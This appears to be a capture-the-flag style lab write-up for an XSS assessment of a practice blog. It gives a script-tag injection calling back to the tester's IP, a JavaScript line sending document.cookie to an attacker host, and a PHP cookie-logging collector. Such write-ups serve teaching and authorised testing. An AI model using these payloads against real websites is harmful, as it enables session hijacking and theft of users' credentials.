XSS Assessment
Related Section:
We are performing a Web Application Penetration Testing task for a company that hired you, which just released their new Security Blog. In our Web Application Penetration Testing plan, we reached the part where you must test the web application against Cross-Site Scripting vulnerabilities (XSS).
Start the server below, make sure you are connected to the VPN, and access the /assessment directory on the server using the browser:
Apply the skills you learned in this module to achieve the following:
Identify a user-input field that is vulnerable to an XSS vulnerability
Find a working XSS payload that executes JavaScript code on the target's browser
Using the
Session Hijackingtechniques, try to steal the victim's cookies, which should contain the flag
Finding XSS Vulnerable Input Field
Navigating through the website there is a section to leave a comment, try the following script (modified to contain the name of the field) in each of the input fields:
First start a PHP http server with:
sudo php -S 0.0.0.0:80Test the below XSS script to see which calls back to our HTTP server:
"><script src=http://10.10.14.7></script>
We see its the website input field that is vulnerable.
Exploiting the Vulnerability
We will create a script hosted on our vm with the following payload:
new Image().src='http://OUR_IP/index.php?c='+document.cookie;AND we will create a PHP script called index.php that will be called in the above execution of script.js and record the cookie of the user's session:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>Next, we start our PHP webserver and then we inject the call for script.js in the vulnerable web input field:
We can see the requests come in along with the flag and the file that was created to record the details:
Last updated